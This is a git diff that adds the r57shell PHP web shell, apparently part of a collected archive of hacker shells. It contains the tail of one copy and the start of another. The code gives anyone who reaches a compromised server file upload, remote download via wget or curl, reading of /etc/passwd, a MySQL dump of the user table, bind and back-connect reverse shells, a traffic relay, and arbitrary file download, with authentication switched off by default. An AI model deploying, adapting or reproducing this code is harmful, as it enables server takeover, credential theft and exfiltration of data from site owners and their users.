+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php safe_mode break test 2 form */
+if($safe_mode)
+{
+echo "<form name=test2 method=post>";
+echo $table_up1; echo $lang[$language.'_text34']; echo $table_up2;
+echo $font;
+echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test2_file size=85 value=";
+echo (!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=test2>";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php safe_mode break test 3 form */
+if($safe_mode&&$mysql_on)
+{
+echo "<form name=test3 method=post>";
+echo $table_up1; echo $lang[$language.'_text35']; echo $table_up2;
+echo $font;
+echo "<b>".ws(27).$lang[$language.'_text36'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_md size=15 value=";
+echo (!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"));
+echo ">";
+echo "<b>".ws(13).$lang[$language.'_text37'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_ml size=15 value=";
+echo (!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"));
+echo ">";
+echo "<b>".ws(12).$lang[$language.'_text38'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_mp size=15 value=";
+echo (!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"));
+echo ">";
+echo "<br><b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_file size=85 value=";
+echo (!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=test3>";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload form */
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1; echo $lang[$language.'_text5']; echo $table_up2;
+echo $font;
+echo "<b>".ws(7).$lang[$language.'_text6'].$arrow.ws(4)."</b>";
+echo "<input type=file name=userfile size=85>&nbsp;";
+echo "<br><b>".ws(20).$lang[$language.'_text21'].$arrow.ws(4)."</b>";
+echo "<input type=checkbox name=nf1 value=1 id=nf1><input type=text name=new_name size=82>".ws(1);
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=\" ".$lang[$language.'_butt2']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload from remote host form */
+if(!$safe_mode&&!$windows){
+echo "<form name=remote_upload method=POST>";
+echo $table_up1; echo $lang[$language.'_text15']; echo $table_up2;
+echo $font;
+echo "<b>".ws(13).$lang[$language.'_text16'].$arrow.ws(4)."</b>";
+echo "<select size=\"1\" name=\"with\">";
+echo "<option value=\"wget\">wget</option>";
+echo "<option value=\"fetch\">fetch</option>";
+echo "<option value=\"lynx\">lynx</option>";
+echo "<option value=\"links\">links</option>";
+echo "<option value=\"curl\">curl</option>";
+echo "<option value=\"GET\">GET</option>";
+echo "</select>&nbsp;<br>";
+echo "<b>".ws(7).$lang[$language.'_text17'].$arrow.ws(4)."</b>";
+echo "<input type=text name=rem_file value=http:// size=85>".ws(2)."<br>";
+echo "<b>".ws(7).$lang[$language.'_text18'].$arrow.ws(4)."</b>";
+echo "<input type=text name=loc_file size=85 value=".$dir.">".ws(1);
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=\" ".$lang[$language.'_butt2']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* mysql dump form */
+if($mysql_on)
+{
+echo "<form name=mysql_dump method=post>";
+echo $table_up1; echo $lang[$language.'_text40']; echo $table_up2;
+echo $font;
+echo "<b>".ws(27).$lang[$language.'_text36'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mysql_db size=15 value=";
+echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
+echo ">";
+echo "<b>".ws(4).$lang[$language.'_text39'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mysql_tbl size=15 value=";
+echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
+echo ">";
+echo "<b>".ws(4).$lang[$language.'_text37'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mysql_l size=15 value=";
+echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
+echo ">";
+echo "<b>".ws(4).$lang[$language.'_text38'].$arrow.ws(1)."</b>";
+echo "<input type=text name=mysql_p size=15 value=";
+echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
+echo "<br><b>".ws(4).$lang[$language.'_text41'].$arrow.ws(1)."</b>";
+echo "<input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
+echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
+echo ">".ws(1);
+echo ws(4)."<input type=submit name=submit value=\" ".$lang[$language.'_butt9']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* port bind form */
+if(!$safe_mode&&!$windows){
+echo "<form name=bind method=POST>";
+echo $table_up1; echo $lang[$language.'_text9']; echo $table_up2;
+echo $font;
+echo "<b>".ws(14).$lang[$language.'_text10'].$arrow.ws(4)."</b>";
+echo "<input type=text name=port size=15 value=11457>".ws(1);
+echo "<b>".ws(6).$lang[$language.'_text11'].$arrow.ws(4)."</b>";
+echo "<input type=text name=bind_pass size=15 value=r57>".ws(1);
+echo "<b>".ws(6).$lang[$language.'_text20'].$arrow.ws(1)."</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(6)."<input type=submit name=submit value=\" ".$lang[$language.'_butt3']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* back connect form */
+if(!$safe_mode&&!$windows){
+echo "<form name=back method=POST>";
+echo $table_up1; echo $lang[$language.'_text12']; echo $table_up2;
+echo $font;
+echo "<b>".ws(22).$lang[$language.'_text13'].$arrow.ws(4)."</b>";
+echo "<input type=text name=ip size=15 value=";
+echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"));
+echo ">".ws(1);
+echo "<b>".ws(37).$lang[$language.'_text14'].$arrow.ws(4)."</b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>".ws(6).$lang[$language.'_text20'].$arrow.ws(1)."</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(6)."<input type=submit name=submit value=\" ".$lang[$language.'_butt4']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* datapipe */
+if(!$safe_mode&&!$windows){
+echo "<div align=center><form name=datapipe method=POST>";
+echo $table_up1; echo $lang[$language.'_text22']; echo $table_up2;
+echo $font;
+echo "<b>".ws(2).$lang[$language.'_text23'].$arrow.ws(1)."</b>";
+echo "<input type=text name=local_port size=5 value=\"31337\">".ws(1);
+echo "<b>".ws(2).$lang[$language.'_text24'].$arrow.ws(1)."</b>";
+echo "<input type=text name=remote_host size=15 value=\"irc.dalnet.ru\">".ws(1);
+echo "<b>".ws(2).$lang[$language.'_text25'].$arrow.ws(1)."</b>";
+echo "<input type=text name=remote_port size=5 value=\"6667\">".ws(1);
+echo "<b>".ws(2).$lang[$language.'_text26'].$arrow.ws(1)."</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">datapipe.pl</option>";
+echo "<option value=\"C\">datapipe.c</option>";
+echo "</select>&nbsp;";
+echo ws(2)."<input type=submit name=submit value=\" ".$lang[$language.'_butt5']." \">";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "</font>";
+echo $table_end1;
+echo "</form></div>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/// end table
+echo "</table>";
+/* (c) */
+echo $table_up3;
+echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version ".$version." ]---o</b></font></div>";
+echo "</td></tr></table>$f";
+
+/* -------------------------[ EOF ]------------------------- */
+?>
diff --git a/xakep-shells/PHP/r57.php.php.txt b/xakep-shells/PHP/r57.php.php.txt
new file mode 100644
index 0000000..55bebd5
--- /dev/null
+++ b/xakep-shells/PHP/r57.php.php.txt
@@ -0,0 +1,2206 @@
+<?php
+/******************************************************************************************************/
+/*
+/*                                     #    #        #    #                             
+/*                                     #   #          #   #
+/*                                    #    #          #    #
+/*                                    #   ##   ####   ##   #
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##   ####   ##   ##
+/*                                   ###   ############   ###
+/*                                   ########################
+/*                                        ##############
+/*                                 ######## ########## #######
+/*                                ###   ##  ##########  ##   ###
+/*                                ###   ##  ##########  ##   ###
+/*                                 ###   #  ##########  #   ###
+/*                                 ###   ##  ########  ##   ###
+/*                                  ##    #   ######   #    ##
+/*                                   ##   #    ####   #    ##
+/*                                     ##                 ##
+/*
+/*
+/*
+/*  r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
+/*  ??????: 1.31
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC.
+/*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
+/*  ?? rst@void.ru. ??? ??????????? ????? ???????????. 
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by 1dt.w0lf
+/*  RST/GHC http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ ????????? | Options  ~~~ */
+
+// ????? ????? | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+
+// ?????????????? | Authentification
+// $auth = 1; - ?????????????? ????????  ( authentification = On  )
+// $auth = 0; - ?????????????? ????????? ( authentification = Off )
+$auth = 0; 
+
+// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
+// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
+// ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'r57'
+// Login & password crypted with md5, default is 'r57'
+$name='ec371748dc2da624b35a4f8f685dd122'; // ????? ????????????  (user login)
+$pass='ec371748dc2da624b35a4f8f685dd122'; // ?????? ???????????? (user password)
+/******************************************************************************************************/
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = '1.31';
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  } 
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="r57shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
+   }
+}   
+$head = '<!-- ??????????, ???? -->
+<html>
+<head>
+<title>r57shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+color: #000000;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+color: #000000;
+}
+.table1 {
+BORDER: 0px;
+BACKGROUND-COLOR: #D4D0C8;
+color: #000000;
+}
+.td1 {
+BORDER: 0px;
+font: 7pt Verdana;
+color: #000000;
+}
+.tr1 {
+BORDER: 0px;
+color: #000000;
+}
+table {
+BORDER:  #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+color: #000000;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+color: #000000;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+color: #000000;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+color: #000000;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+color: #000000;
+}
+BODY {
+margin: 1px;
+color: #000000;
+background-color: #e4e0d8;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        } 
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    } 
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";            
+        $fr   .= "\x00\x00";            
+        $fr   .= "\x08\x00";            
+        $fr   .= $hexdtime;             
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);             
+        $fr      .= pack('V', $c_len);           
+        $fr      .= pack('V', $unc_len);         
+        $fr      .= pack('v', strlen($name));    
+        $fr      .= pack('v', 0);                
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x14\x00";                
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x08\x00";                
+        $cdrec .= $hexdtime;                 
+        $cdrec .= pack('V', $crc);           
+        $cdrec .= pack('V', $c_len);         
+        $cdrec .= pack('V', $unc_len);       
+        $cdrec .= pack('v', strlen($name) ); 
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('V', 32 );            
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('V', strlen($ctrldir)) .           
+            pack('V', strlen($data)) .              
+            "\x00\x00";              
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress')) 
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     } 
+     else if ($compress == 'gzip' && @function_exists('gzencode')) 
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     } 
+     else if ($compress == 'zip' && @function_exists('gzcompress')) 
+     {
+     	$filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     } 
+     else 
+     {
+     	$mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";	
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';	
+ var $base = '';	
+ var $db   = '';	
+ var $connection;
+ var $res;        
+ var $error;      
+ var $rows;       
+ var $columns;     
+ var $num_rows;   
+ var $num_fields; 
+ var $dump;       
+ 
+ function connect()
+  {	   
+  	switch($this->db)
+     {
+  	 case 'MySQL': 	
+  	  if(empty($this->port)) { $this->port = '3306'; }
+  	  if(!function_exists('mysql_connect')) return 0;
+  	  $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);	
+  	  if(is_resource($this->connection)) return 1;
+  	 break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+  	  if(!function_exists('mssql_connect')) return 0;
+  	  $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);	
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;   
+  }
+  
+ function select_db()
+  {
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 if(@mysql_select_db($this->base,$this->connection)) return 1;	
+    break;
+    case 'MSSQL':
+  	 if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;  
+  }
+  
+ function query($query)
+  { 
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+  	case 'MySQL': 	
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) 
+      { 
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      } 
+     else if(is_resource($this->res)) { return 1; }                   
+     return 2;                                                          
+  	break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection))) 
+      {
+      $this->error = 'Query error';
+      return 0;	
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;     
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2; 
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';	
+      }
+     else 
+      { 
+      if(@ociexecute($this->res)) 
+       {	
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;	
+       }
+      $error = @ocierror();
+      $this->error=$error['message']; 
+      }
+    break;
+    }	
+  return 0;
+  }
+ function get_result()
+  { 
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;	
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 $this->num_rows=@mysql_num_rows($this->res);
+  	 $this->num_fields=@mysql_num_fields($this->res);
+  	 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); 
+  	 @mysql_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+  	 $this->num_rows=@mssql_num_rows($this->res);
+  	 $this->num_fields=@mssql_num_fields($this->res);    
+  	 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+  	 @mssql_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+  	 $this->num_rows=@pg_num_rows($this->res); 
+  	 $this->num_fields=@pg_num_fields($this->res);   
+  	 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+  	 @pg_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0; 	
+  }
+ function dump($table)
+  { 
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 $this->dump[0] = '## MySQL dump';
+  	 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+  	 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}	
+  	  $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  }	
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}	
+  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  }	
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} 	
+  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  } 	
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction'; 
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1; 	
+  }
+ function close()
+  { 
+   switch($this->db)
+    {
+  	case 'MySQL': 
+  	 @mysql_close($this->connection); 	
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }	
+  }
+ function affected_rows()
+  { 
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 return @mysql_affected_rows($this->res); 	
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }	
+  }
+ } 
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  else 
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");   
+    echo $filedump;
+    exit();
+   }		
+ }
